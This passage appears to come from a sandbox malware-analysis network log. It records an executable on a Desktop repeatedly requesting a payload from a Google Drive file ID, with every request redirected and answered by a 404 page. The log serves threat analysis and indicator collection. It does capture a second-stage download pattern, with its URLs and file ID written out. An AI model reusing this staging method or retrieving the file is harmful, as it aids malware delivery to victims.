                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:04 GMT
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-fKS1nCBZopWdm8Ixn1kRZQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:04 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 67 36 65 4e 6b 37 73 51 55 57 4a 30 66 70 2d 39 43 72 69 54 74 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="g6eNk7sQUWJ0fp-9CriTtQ">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.11.2049758142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:15 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:15 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:15 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-vqoR29EQIZC6QmdJvgsOpg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.11.2049759142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:15 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:16 UTC1844INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFIdbgSqgw4Xcnoq_mmC0w82Es0CkINiBSNv3gdMKqZSIRhVhWRfYxEfbngKg-jXGBbBOiX8
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:15 GMT
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Content-Security-Policy: script-src 'nonce-boktPEdIAOX-cEICFdwjaw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:16 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 4f 52 5a 31 53 70 57 71 58 36 49 69 4c 75 46 34 4f 4b 32 56 55 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="ORZ1SpWqX6IiLuF4OK2VUw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          14192.168.11.2049760142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:26 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:26 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:26 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-oD9irkpXvSa5dOctwNhrmg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          15192.168.11.2049761142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:26 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:27 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC6uIo5some-btXRcOLd22gMLvc_fEF3ARs7EjTXWqi_iJRU6uxBJH79s0pqNvkWtGR1Iv_7ivY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:27 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7A6MlT_rupybLNtKCERIEw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:27 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 57 41 65 6f 4d 31 64 54 42 51 57 70 45 6a 33 32 2d 36 71 7a 5a 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="WAeoM1dTBQWpEj32-6qzZw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          16192.168.11.2049762142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:37 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:37 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:37 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-QQH2lMTFF70U2mXlE51jqQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Server: ESF
                                                                          Content-Length: 0
                                                                          X-XSS-Protection: 0
                                                                          X-Frame-Options: SAMEORIGIN
                                                                          X-Content-Type-Options: nosniff
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          17192.168.11.2049763142.250.190.974438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:38 UTC459OUTGET /download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Cache-Control: no-cache
                                                                          Host: drive.usercontent.google.com
                                                                          Connection: Keep-Alive
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:38 UTC1851INHTTP/1.1 404 Not Found
                                                                          X-GUploader-UploadID: AFiumC647X2r8U-MTu2n4aPvSdUj3TCScGugC88GXg6g6TgO7vQSPHRs5P0o7lRdkqZFrbGkphzD0tY
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:38 GMT
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-dqRnQ96kB8Cx8gWsNVQXJQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Cross-Origin-Opener-Policy: same-origin
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                          Content-Length: 1652
                                                                          Server: UploadServer
                                                                          Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                          Content-Security-Policy: sandbox allow-scripts
                                                                          Connection: close
                                                                          2025-01-10 14:33:38 UTC1652INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 47 79 39 6b 4c 6c 46 4a 53 5f 53 5f 49 79 4b 62 68 5f 37 6e 77 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c
                                                                          Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="uGy9kLlFJS_S_IyKbh_7nw">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          18192.168.11.2049764142.250.190.1104438016C:\Users\user\Desktop\nRNzqQOQwk.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2025-01-10 14:33:48 UTC417OUTGET /uc?export=download&id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl HTTP/1.1
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
                                                                          Host: drive.google.com
                                                                          Cache-Control: no-cache
                                                                          Cookie: NID=520=V9-zICwi6d4rlT4MuuONzO8qUynnVsyzPQ-ZD_ki1FYBLopwzd4eZVsvIHvnU_LLJQKI2ZnsVwxqqriblW8NelnwtPfL54eYEuszbkwKIjA9W-L5SjR0K2rKCa2YHvIQW-NGFjTbpTnVpqTzGfa1rQKSHCfywUzIRYOsuMNlkKZ-tqf3iGqmBZU
                                                                          2025-01-10 14:33:49 UTC1920INHTTP/1.1 303 See Other
                                                                          Content-Type: application/binary
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Fri, 10 Jan 2025 14:33:48 GMT
                                                                          Location: https://drive.usercontent.google.com/download?id=1RLxH3uYuryGPlzmWfWtbofOIfVaRbLSl&export=download
                                                                          Strict-Transport-Security: max-age=31536000
                                                                          Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                          Content-Security-Policy: script-src 'nonce-7o-NnvPKV0dr57Kpt7IhMw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                          Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                                          Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                                          Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                          Cross-Origin-Opener-Policy: same-origin
